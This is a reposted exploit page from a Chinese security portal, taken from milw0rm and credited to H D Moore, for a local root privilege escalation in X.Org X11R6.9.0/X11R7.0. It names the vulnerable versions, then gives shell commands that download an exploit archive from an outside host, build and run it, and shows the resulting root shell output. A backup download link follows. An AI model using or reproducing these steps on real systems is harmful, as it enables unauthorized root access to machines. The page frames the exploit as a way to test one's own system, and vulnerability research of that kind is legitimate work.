首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
X.Org X11 (X11R6.9.0/X11R7.0) Local Root Privilege Escalation
来源:www.milw0rm.org 作者:H D Moore 发布时间:2006-03-23  

X.Org X11 (X11R6.9.0/X11R7.0) Local Root Privilege Escalation (Exploit)

Summary
"The X.Org Foundation provides an open source implementation of the X Window System." A privileges escalation with in X.org allows attackers to gain root privileges, the following exploit code can be used to test your system for the mentioned vulnerability.

Credit:
The information has been provided by H D Moore.
The original article can be found at: http://www.milw0rm.org/exploits/1596

Details
Vulnerable Systems:
* xorg-server version 1.0.0, as shipped with X11R7.0
* xorg-server version X11R7.0rc
* xorg-server version X11R6.9.0
* xorg-server version X11R6.9.0rc
* xorg-server version X11R6.8.2
* xorg-server version X11R6.8.2rc

Exploit:
# From Daniel Stone's Advisory
# xorg-server 1.0.0, as shipped with X11R7.0, and all release candidates
# of X11R7.0, is vulnerable.
# X11R6.9.0, and all release candidates, are vulnerable.
# X11R6.8.2 and earlier versions are not vulnerable.

# The rest is H D Moore from metasploit

Two second exploit, but if anyone is lazy:

$ wget http://metasploit.com/users/hdm/tools/xmodulepath.tgz
$ tar -zpxvf xmodulepath.tgz
$ cd xmodulepath
$ ./root.sh
/bin/rm -f exploit.o exploit.so shell *.o *.so
gcc -fPIC -c exploit.c
gcc -shared -nostdlib exploit.o -o exploit.so
gcc -o shell shell.c

X Window System Version 7.0.0
Release Date: 21 December 2005
X Protocol Version 11, Revision 0, Release 7.0
[ snip ]
r00t # id
uid=0(root) gid=100(users) groups=10(wheel),18(audio)...

# backup: http://www.milw0rm.com/sploits/xmodulepath.tgz

# milw0rm.com [2006-03-20]




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·A vulnerability in HT 9.1 Expl
·BomberClone Buffer Overflow Ex
·Mercur IMAPD Buffer Overflow (
·Apple Mac OS X File Rewrites a
·MyBB version 1.04 and prior SQ
·FarsiNews Remote File Inclusio
·KnowledgebasePublisher 1.2 Rem
·IGMP v3 DoS (MS06-007, Exploit
·Microsoft Windows Telephony Se
·ASPPortal <= 3.1.1 Remote S
·Apple OSX Mail.app RFC1740 Rea
·The IIS Worker Process (w3wp)
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved